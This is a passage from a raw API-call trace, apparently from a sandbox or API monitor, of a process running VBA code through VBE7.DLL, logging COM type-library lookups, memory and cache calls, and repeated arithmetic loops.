out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.557] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.557] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.557] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.557] IUnknown:Release (This=0x665ba50) returned 0xd [0069.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.557] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x3810) returned 0xaf1b5b0 [0069.557] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.557] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.557] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.557] IUnknown:Release (This=0x665ba50) returned 0xd [0069.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.557] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.558] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.558] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.558] IUnknown:Release (This=0x665ba50) returned 0xd [0069.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.558] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.558] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.558] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.558] IUnknown:Release (This=0x665ba50) returned 0xd [0069.558] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.559] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.559] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.559] IUnknown:Release (This=0x665ba50) returned 0xd [0069.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.559] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.559] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.559] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.559] IUnknown:Release (This=0x665ba50) returned 0xd [0069.559] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.560] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.562] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x3c10) returned 0xaf1b5b0 [0069.562] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x4010) returned 0xaf1b5b0 [0069.562] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x3f5e) returned 0xaf1b5b0 [0069.562] IMalloc:Free (This=0x7fefec05380, pv=0x680aa00) [0069.562] GetCurrentProcess () returned 0xffffffffffffffff [0069.562] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0069.562] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6238, dwSize=0x8) returned 1 [0069.562] GetCurrentProcess () returned 0xffffffffffffffff [0069.562] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0069.562] GetCurrentProcess () returned 0xffffffffffffffff [0069.562] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0069.562] GetCurrentProcess () returned 0xffffffffffffffff [0069.562] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0069.562] GetCurrentProcess () returned 0xffffffffffffffff [0069.562] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0069.563] GetCurrentProcess () returned 0xffffffffffffffff [0069.563] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6de0, dwSize=0x8) returned 1 [0069.563] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.563] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.563] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.563] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.563] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.563] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d8 | out: ppvObject=0x1462d8*=0x0) returned 0x80004002 [0069.563] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1462d0 | out: ppvObject=0x1462d0*=0x0) returned 0x80004002 [0069.563] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.564] VarCmp (pvarLeft=0xaeff6e0, pvarRight=0xaeff6c8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.564] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff698, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.564] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.564] VarDiv (in: pvarLeft=0xaeff650, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.564] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.564] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.564] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff378, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.564] VarCmp (pvarLeft=0xaeff348, pvarRight=0xaeff330, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.564] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff318, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.564] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.564] VarDiv (in: pvarLeft=0xaeff2e8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.564] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.564] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.564] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff270, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.564] VarCmp (pvarLeft=0xaeff228, pvarRight=0xaeff210, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.564] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff1f8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.565] VarDiv (in: pvarLeft=0xaeff1c8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.565] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.565] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff150, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarCmp (pvarLeft=0xaeff120, pvarRight=0xaeff108, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.565] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff0f0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.565] VarDiv (in: pvarLeft=0xaeff0c0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.565] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.565] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaeff048, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarCmp (pvarLeft=0xaeff018, pvarRight=0xaeff000, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.565] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefefe8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.565] VarDiv (in: pvarLeft=0xaefefb8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.565] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.565] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefef40, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarCmp (pvarLeft=0xaefeef8, pvarRight=0xaefeee0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.565] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeec8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.565] VarDiv (in: pvarLeft=0xaefee98, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.565] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.565] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefee20, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarCmp (pvarLeft=0xaefedf0, pvarRight=0xaefedd8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefedc0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] sqrt (_X=0x3) returned 0x41b0000000000000 [0069.566] VarDiv (in: pvarLeft=0xaefed90, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.566] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefed18, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarCmp (pvarLeft=0xaefecd0, pvarRight=0xaefecb8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeca0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.566] VarDiv (in: pvarLeft=0xaefec70, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.566] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefebf8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarCmp (pvarLeft=0xaefebc8, pvarRight=0xaefebb0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeb98, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.566] VarDiv (in: pvarLeft=0xaefeb68, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.566] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeaf0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarCmp (pvarLeft=0xaefeac0, pvarRight=0xaefeaa8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.566] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefea90, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] sqrt (_X=0x3) returned 0x4190000000000000 [0069.566] VarDiv (in: pvarLeft=0xaefea60, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.566] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.567] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe9e8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarCmp (pvarLeft=0xaefe9a0, pvarRight=0xaefe988, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe970, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.567] VarDiv (in: pvarLeft=0xaefe940, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.567] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe8c8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarCmp (pvarLeft=0xaefe898, pvarRight=0xaefe880, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe868, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.567] VarDiv (in: pvarLeft=0xaefe838, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.567] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe7c0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarCmp (pvarLeft=0xaefe778, pvarRight=0xaefe760, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe748, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.567] VarDiv (in: pvarLeft=0xaefe718, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.567] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe6a0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarCmp (pvarLeft=0xaefe670, pvarRight=0xaefe658, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.567] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe640, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] sqrt (_X=0x3) returned 0x4180000000000000 [0069.567] VarDiv (in: pvarLeft=0xaefe610, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.567] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.568] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe598, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarCmp (pvarLeft=0xaefe568, pvarRight=0xaefe550, lcid=0x0, dwFlags=0x30001) returned 0x1 [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe538, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] sqrt (_X=0x3) returned 0x41c0000000000000 [0069.568] VarDiv (in: pvarLeft=0xaefe508, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0069.568] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0069.568] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0069.568] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe490, pvarResult=0xaeff6b0 | out: 